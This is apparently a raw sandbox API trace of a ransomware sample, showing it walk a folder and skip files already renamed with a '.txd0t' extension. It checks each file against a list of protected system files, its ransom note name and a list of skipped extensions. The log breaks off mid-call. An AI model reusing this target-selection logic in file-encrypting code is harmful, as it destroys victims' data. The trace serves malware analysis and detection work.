ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x59643e0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17400, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9Rast_x86.msi.txd0t", cAlternateFileName="RGB9RA~1.TXD")) returned 1 [0128.861] StrCmpW (psz1="RGB9Rast_x86.msi.txd0t", psz2=".") returned 1 [0128.861] StrCmpW (psz1="RGB9Rast_x86.msi.txd0t", psz2="..") returned 1 [0128.861] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.861] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9Rast_x86.msi.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t") returned="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.txd0t" [0128.862] PathFindExtensionW (pszPath="RGB9Rast_x86.msi.txd0t") returned=".txd0t" [0128.862] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.862] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0128.862] StrCmpW (psz1="Setup.exe", psz2=".") returned 1 [0128.862] StrCmpW (psz1="Setup.exe", psz2="..") returned 1 [0128.862] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.862] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.862] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Setup.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Setup.exe") returned="C:\\588bce7c90097ed212\\Setup.exe" [0128.862] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0128.862] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="bootsect.bak") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="iconcache.db") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="thumbs.db") returned -1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2=" ransomware ") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2=" ransom ") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="debug.txt") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="boot.ini") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="desktop.ini") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="autorun.inf") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="ntuser.dat") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="ntldr") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="ntdetect.com") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="bootfont.bin") returned 1 [0128.862] StrCmpIW (psz1="Setup.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.862] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0128.862] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0128.862] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0128.862] StrCmpW (psz1="SetupEngine.dll", psz2=".") returned 1 [0128.862] StrCmpW (psz1="SetupEngine.dll", psz2="..") returned 1 [0128.862] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.862] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.862] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupEngine.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupEngine.dll") returned="C:\\588bce7c90097ed212\\SetupEngine.dll" [0128.862] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0128.862] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="bootsect.bak") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="iconcache.db") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="thumbs.db") returned -1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransomware ") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransom ") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="debug.txt") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="boot.ini") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="desktop.ini") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="autorun.inf") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="ntuser.dat") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="ntldr") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="ntdetect.com") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="bootfont.bin") returned 1 [0128.863] StrCmpIW (psz1="SetupEngine.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.863] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0128.863] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.863] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0128.863] StrCmpW (psz1="SetupUi.dll", psz2=".") returned 1 [0128.863] StrCmpW (psz1="SetupUi.dll", psz2="..") returned 1 [0128.863] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.863] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.863] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.dll") returned="C:\\588bce7c90097ed212\\SetupUi.dll" [0128.863] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0128.863] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="bootsect.bak") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="iconcache.db") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="thumbs.db") returned -1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2=" ransomware ") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2=" ransom ") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="debug.txt") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="boot.ini") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="desktop.ini") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="autorun.inf") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="ntuser.dat") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="ntldr") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="ntdetect.com") returned 1 [0128.863] StrCmpIW (psz1="SetupUi.dll", psz2="bootfont.bin") returned 1 [0128.864] StrCmpIW (psz1="SetupUi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.864] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0128.864] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.864] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5966a03f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x77a8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.xsd.txd0t", cAlternateFileName="SETUPU~1.TXD")) returned 1 [0128.864] StrCmpW (psz1="SetupUi.xsd.txd0t", psz2=".") returned 1 [0128.864] StrCmpW (psz1="SetupUi.xsd.txd0t", psz2="..") returned 1 [0128.864] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.864] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.864] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.xsd.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t") returned="C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t" [0128.864] PathFindExtensionW (pszPath="SetupUi.xsd.txd0t") returned=".txd0t" [0128.864] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.864] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0128.864] StrCmpW (psz1="SetupUtility.exe", psz2=".") returned 1 [0128.864] StrCmpW (psz1="SetupUtility.exe", psz2="..") returned 1 [0128.864] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.864] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.864] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUtility.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUtility.exe") returned="C:\\588bce7c90097ed212\\SetupUtility.exe" [0128.864] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0128.864] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="bootsect.bak") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="iconcache.db") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="thumbs.db") returned -1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2=" ransomware ") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2=" ransom ") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="debug.txt") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="boot.ini") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="desktop.ini") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="autorun.inf") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="ntuser.dat") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="ntldr") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="ntdetect.com") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="bootfont.bin") returned 1 [0128.864] StrCmpIW (psz1="SetupUtility.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.864] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0128.864] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0128.865] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x596902d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa278, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SplashScreen.bmp.txd0t", cAlternateFileName="SPLASH~1.TXD")) returned 1 [0128.865] StrCmpW (psz1="SplashScreen.bmp.txd0t", psz2=".") returned 1 [0128.865] StrCmpW (psz1="SplashScreen.bmp.txd0t", psz2="..") returned 1 [0128.865] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.865] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.865] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SplashScreen.bmp.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t") returned="C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t" [0128.865] PathFindExtensionW (pszPath="SplashScreen.bmp.txd0t") returned=".txd0t" [0128.865] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.865] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0128.865] StrCmpW (psz1="sqmapi.dll", psz2=".") returned 1 [0128.865] StrCmpW (psz1="sqmapi.dll", psz2="..") returned 1 [0128.865] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.865] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.865] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="sqmapi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\sqmapi.dll") returned="C:\\588bce7c90097ed212\\sqmapi.dll" [0128.865] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0128.865] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="bootsect.bak") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="iconcache.db") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="thumbs.db") returned -1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2=" ransomware ") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2=" ransom ") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="debug.txt") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="boot.ini") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="desktop.ini") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="autorun.inf") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="ntuser.dat") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="ntldr") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="ntdetect.com") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="bootfont.bin") returned 1 [0128.865] StrCmpIW (psz1="sqmapi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.865] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0128.865] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.865] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x596902d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3904, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Strings.xml.txd0t", cAlternateFileName="STRING~1.TXD")) returned 1 [0128.865] StrCmpW (psz1="Strings.xml.txd0t", psz2=".") returned 1 [0128.865] StrCmpW (psz1="Strings.xml.txd0t", psz2="..") returned 1 [0128.865] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Strings.xml.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Strings.xml.txd0t") returned="C:\\588bce7c90097ed212\\Strings.xml.txd0t" [0128.866] PathFindExtensionW (pszPath="Strings.xml.txd0t") returned=".txd0t" [0128.866] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.866] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x596dc778, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x99f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 1 [0128.866] StrCmpW (psz1="UiInfo.xml.txd0t", psz2=".") returned 1 [0128.866] StrCmpW (psz1="UiInfo.xml.txd0t", psz2="..") returned 1 [0128.866] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="UiInfo.xml.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\UiInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\UiInfo.xml.txd0t" [0128.866] PathFindExtensionW (pszPath="UiInfo.xml.txd0t") returned=".txd0t" [0128.866] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.866] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x596dc778, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x19888, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="watermark.bmp.txd0t", cAlternateFileName="WATERM~1.TXD")) returned 1 [0128.866] StrCmpW (psz1="watermark.bmp.txd0t", psz2=".") returned 1 [0128.866] StrCmpW (psz1="watermark.bmp.txd0t", psz2="..") returned 1 [0128.866] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="watermark.bmp.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\watermark.bmp.txd0t") returned="C:\\588bce7c90097ed212\\watermark.bmp.txd0t" [0128.866] PathFindExtensionW (pszPath="watermark.bmp.txd0t") returned=".txd0t" [0128.866] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.866] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0128.866] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=".") returned 1 [0128.866] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="..") returned 1 [0128.866] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.866] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" [0128.866] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0128.866] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0128.866] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0128.866] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="iconcache.db") returned 1 [0128.866] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="thumbs.db") returned 1 [0128.866] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransomware ") returned 1 [0128.866] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransom ") returned 1 [0128.866] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="debug.txt") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="boot.ini") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="desktop.ini") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="autorun.inf") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntldr") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0128.867] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0128.867] StrCmpIW 